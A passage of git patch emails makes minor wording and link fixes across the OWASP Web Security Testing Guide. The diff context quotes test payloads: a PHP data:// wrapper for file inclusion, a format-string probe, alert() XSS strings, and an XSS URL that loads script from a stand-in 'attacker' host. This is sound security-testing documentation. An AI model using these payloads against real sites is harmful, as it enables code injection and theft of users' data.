-In order to test for LFI using this wrapper, the code to be executed should be Base64 encoded. For example, `<?php phpinfo(); ?>` would be encoded as: `PD9waHAgcGhwaW5mbygpOyA/Pg==` and the payload would be represented as: `data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==`.
+In order to test for LFI using this wrapper, the code to be executed should be base64 encoded. For example, `<?php phpinfo(); ?>` would be encoded as: `PD9waHAgcGhwaW5mbygpOyA/Pg==` and the payload would be represented as: `data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==`.
 
 ##### PHP Expect
 

From ca633814db4eaba70caf7c94a6504a94f687a757 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:55:54 +0530
Subject: [PATCH 11/37] mistake fixed
 4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection
 (#591)

---
 .../10-Testing_for_Command_Injection.md                         | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md
index afd6456cc1..03f669834c 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md
@@ -36,7 +36,7 @@ Example:
 
 ### Example
 
-Consider the case of an application that contains a set of documents that you can browse from the Internet. If you fire up a personal proxy (such as ZAP or Burp Suite), you can obtain a POST HTTP like the following (`http://www.example.com/public/doc`):
+Consider the case of an application that contains a set of documents that you can browse from the internet. If you fire up a personal proxy (such as ZAP or Burp Suite), you can obtain a POST HTTP like the following (`http://www.example.com/public/doc`):
 
 ```txt
 POST /public/doc HTTP/1.1

From 796ff397264aeb3d340ce8686ef409ffe0f984d7 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:56:58 +0530
Subject: [PATCH 12/37] mistake fixed
 4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection
 (#591)

---
 .../12-Testing_for_Format_String_Injection.md                   | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md
index 83c8fab689..588c4ccf2c 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md
@@ -82,7 +82,7 @@ Testers can perform a manual test using a web browser or other web API debugging
 
 `https://vulnerable_host/userinfo?username=%25s%25s%25s%25n`
 
-If the web site is vulnerable, the browser or tool should receive an error, which may include a timeout or an HTTP return code 500.
+If the site is vulnerable, the browser or tool should receive an error, which may include a timeout or an HTTP return code 500.
 
 The Java code returns the error
 

From 6f4e77f4a6b84fc9c6a9e58c34bd8ee53ad85170 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:58:24 +0530
Subject: [PATCH 13/37] mistake fixed
 4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability
 (#591)

---
 .../13-Testing_for_Incubated_Vulnerability.md                 | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md
index 90a0c49897..7e121082e1 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md
@@ -22,7 +22,7 @@ This type of asynchronous attack covers a great spectrum of attack vectors, amon
 - File upload components in a web application, allowing the attacker to upload corrupted media files (JPEG images exploiting `CVE-2004-0200`, PNG images exploiting `CVE-2004-0597`, executable files, site pages with active component, etc.)
 - Cross-site scripting issues in public forums posts (see [Testing for Stored Cross Site Scripting](02-Testing_for_Stored_Cross_Site_Scripting.md) for additional details). An attacker could potentially store malicious scripts or code in a repository in the backend of the web-application (e.g., a database) so that this script/code gets executed by one of the users (end users, administrators, etc). The archetypical incubated attack is exemplified by using a cross-site scripting vulnerability in a user forum, bulletin board, or blog in order to inject some JavaScript code at the vulnerable page, and will be eventually rendered and executed at the site user's browser --using the trust level of the original (vulnerable) site at the user's browser.
 - SQL/XPATH Injection allowing the attacker to upload content to a database, which will be later retrieved as part of the active content in a web page. For example, if the attacker can post arbitrary JavaScript in a bulletin board so that it gets executed by users, then he might take control of their browsers (e.g., [XSS-proxy](http://sourceforge.net/projects/xss-proxy)).
-- Misconfigured servers allowing installation of Java packages or similar web site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.)
+- Misconfigured servers allowing installation of Java packages or similar site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.)
 
 ## Test Objectives
 
@@ -51,7 +51,7 @@ Usually, this set of examples leverages XSS attacks by exploiting a SQL-injectio
 
 The tester then has to match the XSS attacks he has devised with the entries that he is allowed to insert.
 
-In a similar fashion as in the previous XSS example, use a web page field vulnerable to SQL injection issues to change a value in the database that would be used by the application as input to be shown at the site without proper filtering (this would be a combination of an SQL injection and a XSS issue). For instance, let's suppose there is a `footer` table at the database with all footers for the web site pages, including a `notice` field with the legal notice that appears at the bottom of each web page. You could use the following query to inject JavaScript code to the `notice` field at the `footer` table in the database.
+In a similar fashion as in the previous XSS example, use a web page field vulnerable to SQL injection issues to change a value in the database that would be used by the application as input to be shown at the site without proper filtering (this would be a combination of an SQL injection and a XSS issue). For instance, let's suppose there is a `footer` table at the database with all footers for the site pages, including a `notice` field with the legal notice that appears at the bottom of each web page. You could use the following query to inject JavaScript code to the `notice` field at the `footer` table in the database.
 
 ```sql
 SELECT field1, field2, field3

From 57577bb9f6257a1b382c8c953de08830c9a570a0 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 16:00:07 +0530
Subject: [PATCH 14/37] Mistake fixed
 4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling
 (#591)

---
 .../14-Testing_for_HTTP_Splitting_Smuggling.md                  | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md
index cac1f31858..0ba8ac0e9e 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md
@@ -60,7 +60,7 @@ Content-Length: 35
 <other data>
 ```
 
-The web cache will see two different responses, so if the attacker sends, immediately after the first request, a second one asking for `/index.html`, the web cache will match this request with the second response and cache its content, so that all subsequent requests directed to `victim.com/index.html` passing through that web cache will receive the "system down" message. In this way, an attacker would be able to effectively deface the site for all users using that web cache (the whole Internet, if the web cache is a reverse proxy for the web application).
+The web cache will see two different responses, so if the attacker sends, immediately after the first request, a second one asking for `/index.html`, the web cache will match this request with the second response and cache its content, so that all subsequent requests directed to `victim.com/index.html` passing through that web cache will receive the "system down" message. In this way, an attacker would be able to effectively deface the site for all users using that web cache (the whole internet, if the web cache is a reverse proxy for the web application).
 
 Alternatively, the attacker could pass to those users a JavaScript snippet that mounts a cross site scripting attack, e.g., to steal the cookies. Note that while the vulnerability is in the application, the target here is its users. Therefore, in order to look for this vulnerability, the tester needs to identify all user controlled input that influences one or more headers in the response, and check whether they can successfully inject a CR+LF sequence in it.
 

From 3b2529704a5e485a6943bedf8603a2aaa5f49d1f Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 16:01:54 +0530
Subject: [PATCH 15/37]  Mistake fixed
 document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection
 (#591)

---
 .../16-Testing_for_Host_Header_Injection.md                     | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md
index f4ddb93132..3abe134bd4 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md
@@ -116,7 +116,7 @@ https://www.attacker.com/reset.php?token=12345
 
 In some cases a server may have virtual hosts that are not intended to be externally accessible. This is most common with a [split-horizon](https://en.wikipedia.org/wiki/Split-horizon_DNS) DNS setup (where internal and external DNS servers return different records for the same domain).
 
-For example, an organization may have a single webserver on their internal network, which hosts both their public website (on `www.example.org`) and their internal Intranet (on `intranet.example.org`, but that record only exists on the internal DNS server). Although it would not be possible to browse directly to `intranet.example.org` from outside the network (as the domain would not resolve), it may be possible to access to Intranet by making a request from outside with the following `Host` header:
+For example, an organization may have a single webserver on their internal network, which hosts both their public site (on `www.example.org`) and their internal Intranet (on `intranet.example.org`, but that record only exists on the internal DNS server). Although it would not be possible to browse directly to `intranet.example.org` from outside the network (as the domain would not resolve), it may be possible to access to Intranet by making a request from outside with the following `Host` header:
 
 ```http
 Host: intranet.example.org

From da5a26bb716faf3182e44087deecb74677765a52 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 16:03:19 +0530
Subject: [PATCH 16/37] Mistake fixed
 document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection
 (#591)

---
 .../17-Testing_for_Server-side_Template_Injection.md          | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md
index f4e49e31f9..f4e8d94a3c 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md
@@ -120,7 +120,7 @@ The tester can also identify what other objects, methods and properties can be e
 - [James Kettle: Server-Side Template Injection:RCE for the modern webapp (whitepaper)](https://portswigger.net/kb/papers/serversidetemplateinjection.pdf)
 - [Server-Side Template Injection](https://portswigger.net/blog/server-side-template-injection)
 - [Exploring SSTI in Flask/Jinja2](https://www.lanmaster53.com/2016/03/exploring-ssti-flask-jinja2/)
-- [Server Side Template Injection: from detection to Remote shell](https://www.okiok.com/server-side-template-injection-from-detection-to-remote-shell/)
+- [Server-ide Template Injection: from detection to Remote shell](https://www.okiok.com/server-side-template-injection-from-detection-to-remote-shell/)
 - [Extreme Vulnerable Web Application](https://github.com/s4n7h0/xvwa)
-- [Divine Selorm Tsa: Exploiting server side template injection with tplmap](https://owasp.org/www-pdf-archive/Owasp_SSTI_final.pdf)
+- [Divine Selorm Tsa: Exploiting server-side template injection with tplmap](https://owasp.org/www-pdf-archive/Owasp_SSTI_final.pdf)
 - [Exploiting SSTI in Thymeleaf](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)

From 4f972b8e3f53062ff225804a1949f51809bda879 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 16:04:40 +0530
Subject: [PATCH 17/37] Mistake fixed
 document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery
 (#591)

---
 .../18-Testing_for_Server-Side_Request_Forgery.md           | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md
index 21047359fd..da872368ea 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md
@@ -16,7 +16,7 @@ Web applications often interact with internal or external resources. While you m
 
 ## How to Test
 
-When testing for SSRF, you attempt to make the targeted server inadvertently load or save content that could be malicious. The most common test is for local and remote file inclusion. There is also another facet to SSRF: a trust relationship that often arises where the application server is able to interact with other back-end systems that are not directly reachable by users. These back-end systems often have non-routable private IP addresses or are restricted to certain hosts. Since they are protected by the network topology, they often lack more sophisticated controls. These internal systems often contain sensitive data or functionality.
+When testing for SSRF, you attempt to make the targeted server inadvertently load or save content that could be malicious. The most common test is for local and remote file inclusion. There is also another facet to SSRF: a trust relationship that often arises where the application server is able to interact with other backend systems that are not directly reachable by users. These backend systems often have non-routable private IP addresses or are restricted to certain hosts. Since they are protected by the network topology, they often lack more sophisticated controls. These internal systems often contain sensitive data or functionality.
 
 Consider the following request:
 
@@ -94,14 +94,14 @@ For additional payloads and bypass techniques, see the [references](#references)
 
 ## Remediation
 
-SSRF is known to be one of the hardest attacks to defeat without the use of allow lists that require specific IPs and URLs to be allowed. For more on SSRF prevention, read the [Server Side Request Forgery Prevention Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html).
+SSRF is known to be one of the hardest attacks to defeat without the use of allow lists that require specific IPs and URLs to be allowed. For more on SSRF prevention, read the [Server-side Request Forgery Prevention Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html).
 
 ## References
 
 - [swisskyrepo: SSRF Payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
 - [Reading Internal Files Using SSRF Vulnerability](https://medium.com/@neerajedwards/reading-internal-files-using-ssrf-vulnerability-703c5706eefb)
 - [Abusing the AWS Metadata Service Using SSRF Vulnerabilities](https://blog.christophetd.fr/abusing-aws-metadata-service-using-ssrf-vulnerabilities/)
-- [OWASP Server Side Request Forgery Prevention Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)
+- [OWASP Server-side Request Forgery Prevention Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)
 - [Portswigger: SSRF](https://portswigger.net/web-security/ssrf)
 - [Portswigger: Blind SSRF](https://portswigger.net/web-security/ssrf/blind)
 - [Bugcrowd Webinar: SSRF](https://www.bugcrowd.com/resources/webinars/server-side-request-forgery/)

From 407ef1eeb494a46b4b658cafd15c116ac86e047f Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 16:05:59 +0530
Subject: [PATCH 18/37] Mistake fixed
 4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment
 (#591)

---
 .../19-Testing_for_Mass_Assignment.md                           | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md
index 4b52c61732..3b11b0ee4d 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md
@@ -81,7 +81,7 @@ The user is then created with the `isAdmin` property set to `true`, giving them
 
 #### Detect Handlers
 
-In order to determine which part of the application is vulnerable to mass assignment, enumerate all parts of the application that accept content from the user and can potentially be mapped with a model. This includes all HTTP requests (most likely GET, POST, and PUT) that appear to allow create or update operations on the back end.
+In order to determine which part of the application is vulnerable to mass assignment, enumerate all parts of the application that accept content from the user and can potentially be mapped with a model. This includes all HTTP requests (most likely GET, POST, and PUT) that appear to allow create or update operations on the backend.
 One of the most simple indicators for potential mass assignments is the presence of bracket syntax for input parameter names, as for example:
 
 ```html

From 3c18cf3a48c7b496d566eab271118d914f056114 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 16:10:49 +0530
Subject: [PATCH 19/37] Mistake fixed
 4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting
 (#591)

---
 .../01.1-Testing_for_Reflected_Cross_Site_Scripting.md        | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md
index 4b2da3a0c2..0f156a6bb1 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md
@@ -161,7 +161,7 @@ Now suppose that developers of the target site implemented the following code to
 Decoupling the above regular expression:
 
 1. Check for a `<script`
-2. Check for a " " (white space)
+2. Check for a " " (whitespace)
 3. Any character but the character `>` for one or more occurrences
 4. Check for a `src`
 
@@ -171,7 +171,7 @@ This is useful for filtering expressions like `<script src="http://attacker/xss.
 http://example/?var=<SCRIPT%20a=">"%20SRC="http://attacker/xss.js"></SCRIPT>
 ```
 
-This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim web site, `http://example/`.
+This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim website, `http://example/`.
 
 #### Example 7: HTTP Parameter Pollution (HPP)
 

From d9985e579bc2f4a6ca245a5ffece27f4091f0454 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 16:13:41 +0530
Subject: [PATCH 20/37] Mistake fixed
 4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting
 (#591)

---
 .../01.2-Testing_for_Stored_Cross_Site_Scripting.md    | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md
index 0af255b50c..f0b57b5788 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md
@@ -4,7 +4,7 @@
 
 Stored [Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.
 
-Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.
+Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the website and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.
 
 This vulnerability can be used to conduct a number of browser-based attacks including:
 
@@ -39,7 +39,7 @@ The process for identifying stored XSS vulnerabilities is similar to the process
 
 #### Input Forms
 
-The first step is to identify all points where user input is stored into the back-end and then displayed by the application. Typical examples of stored user input can be found in:
+The first step is to identify all points where user input is stored into the backend and then displayed by the application. Typical examples of stored user input can be found in:
 
 - User/Profiles page: the application allows the user to edit/change profile details such as first name, last name, nickname, avatar, picture, address, etc.
 - Shopping cart: the application allows the user to store items into the shopping cart which can then be reviewed later
@@ -155,12 +155,12 @@ Blind Cross-site Scripting is a form of stored XSS. It generally occurs when the
 
 Gray-box testing is similar to black-box testing. In gray-box testing, the pen-tester has partial knowledge of the application. In this case, information regarding user input, input validation controls, and data storage might be known by the pen-tester.
 
-Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the back-end system. The following steps are recommended:
+Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the backend system. The following steps are recommended:
 
-- Use front-end application and enter input with special/invalid characters
+- Use frontend application and enter input with special/invalid characters
 - Analyze application response(s)
 - Identify presence of input validation controls
-- Access back-end system and check if input is stored and how it is stored
+- Access backend system and check if input is stored and how it is stored
 - Analyze source code and understand how stored input is rendered by the application
 
 If source code is available (as in white-box testing), all variables used in input forms should be analyzed. In particular, programming languages such as PHP, ASP, and JSP make use of predefined variables/functions to store input from HTTP GET and POST requests.

From 04a6714e75ced13c9db4c835715f73265cb73874 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 16:38:04 +0530
Subject: [PATCH 21/37] Mistake fixed
 4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting
 (#591)

---
 .../01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md     | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md
index bfeeb5b7bb..fbd45874f9 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md
@@ -19,7 +19,7 @@ The process of testing for Self DOM-Based cross site scripting follows:
 
 This specific example is from this [hackerone ticket](https://hackerone.com/reports/406587).
 
-In the example the following JavaScript function is executed on the website `https://example.com`.
+In the example the following JavaScript function is executed on the site `https://example.com`.
 
 ```js
 //Marketo Form Code

From cd15fd441c215c72cdc71fdb6d6e2c339aee7830 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Sat, 1 Jul 2023 07:53:33 +0530
Subject: [PATCH 22/37] links are broken mistake fixed in
 4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection
 (#591)

---
 .../03-Testing_for_SQL_Injection.md              | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md
index 26ca0c5afb..c98977662f 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md
@@ -805,14 +805,14 @@ For generic input validation security, refer to the [Input Validation CheatSheet
 
 Technology specific Testing Guide pages have been created for the following DBMSs:
 
-- [Oracle](05.1-Testing_for_Oracle.md)
-- [MySQL](05.2-Testing_for_MySQL.md)
-- [SQL Server](05.3-Testing_for_SQL_Server.md)
-- [PostgreSQL](05.4-Testing_PostgreSQL.md)
-- [MS Access](05.5-Testing_for_MS_Access.md)
-- [NoSQL](05.6-Testing_for_NoSQL_Injection.md)
-- [ORM](05.7-Testing_for_ORM_Injection.md)
-- [Client-side](05.8-Testing_for_Client-side.md)
+- [Oracle](03.1-Testing_for_Oracle.md)
+- [MySQL](03.2-Testing_for_MySQL.md)
+- [SQL Server](03.3-Testing_for_SQL_Server.md)
+- [PostgreSQL](03.4-Testing_PostgreSQL.md)
+- [MS Access](03.5-Testing_for_MS_Access.md)
+- [NoSQL](03.6-Testing_for_NoSQL_Injection.md)
+- [ORM](03.7-Testing_for_ORM_Injection.md)
+- [Client-side](03.8-Testing_for_Client-side.md)
 
 ### Whitepapers
 

From 9bc3108a85f7e9aa71629623d4edece91cbea45d Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Sat, 1 Jul 2023 07:57:37 +0530
Subject: [PATCH 23/37] mistake with code blok surrounded by blank lines fixed
 (#591)

---
 .../01-Testing_for_Cross_Site_Scripting.md                   | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
index 1e4229772c..bc26715b24 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
@@ -19,14 +19,17 @@ DOM-based XSS: The vulnerability arises from insecure handling of client-side Ja
 An XSS attack occurs when an attacker can inject untrusted data into a web application, which is then included in a response that is sent to other users. This untrusted data can be included in various contexts within an HTML document, including:
 
 HTML tags: If user-supplied input is inserted without proper encoding into HTML tags, it can lead to script execution. For example:
+
 ```js
 <script>alert('XSS');</script>
 ```
+
 HTML attributes: If user-supplied input is included in HTML attributes without proper encoding, it can be exploited to execute scripts. For example:
 
 ```js
 <img src="x" onerror="alert('XSS')">
 ```
+
 JavaScript code: If user-supplied input is directly inserted into JavaScript code without proper escaping or validation, it can lead to script execution. For example, 
 
 ```js
@@ -57,6 +60,7 @@ The first step in XSS testing is to identify all user-supplied input fields or p
 Once the input fields or parameters are identified, the following techniques can be employed to detect XSS vulnerabilities:
 
 HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example: 
+
 ```js
 <script>alert('XSS');</script>
 ```
@@ -72,6 +76,7 @@ Attribute Injection: Inject special characters or event handlers into HTML attri
 If the injected content is rendered without proper encoding, the browser will interpret it as part of the attribute value, leading to script execution.
 
 JavaScript Injection: Inject JavaScript code into areas of the application where it is expected to be executed. This includes JavaScript code within `<script>` tags, inline event handlers, or within JavaScript variables. For example: 
+
 ```js
 ');alert('XSS');//
 ````

From 42f5333789ac37a84c035d73187dd5b261ffb18a Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Sat, 1 Jul 2023 08:07:21 +0530
Subject: [PATCH 24/37] Removed broken link from 03.1-Testing_for_Oracle (#591)

---
 .../07-Input_Validation_Testing/03.1-Testing_for_Oracle.md    | 4 ----
 1 file changed, 4 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md
index 029558767a..9dd258e884 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md
@@ -334,10 +334,6 @@ returns an error or a `404`, then there might be a SQL injection flaw. This can
 
 If this request returns books by Charles Dickens, you've confirmed the presence of the SQL injection vulnerability.
 
-## Tools
-
-- [Orascan (Oracle Web Application VA scanner), NGS SQuirreL (Oracle RDBMS VA Scanner)](https://www.nccgroup.trust/globalassets/service-pages/documents/security-consulting/information-security-software/ncc-squirrel-suite.pdf)
-
 ## References
 
 ### Whitepapers

From 5e4e779ab350bba6573d299922c9a2e122aabfa3 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Sat, 1 Jul 2023 08:08:21 +0530
Subject: [PATCH 25/37] new line and other format error fixed (#591)

---
 .../01.3-Testing_for_DOM-based_Cross_Site_Scripting.md      | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
index b0eed18c1b..9a99d63cd4 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
@@ -1,9 +1,9 @@
-cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).
-
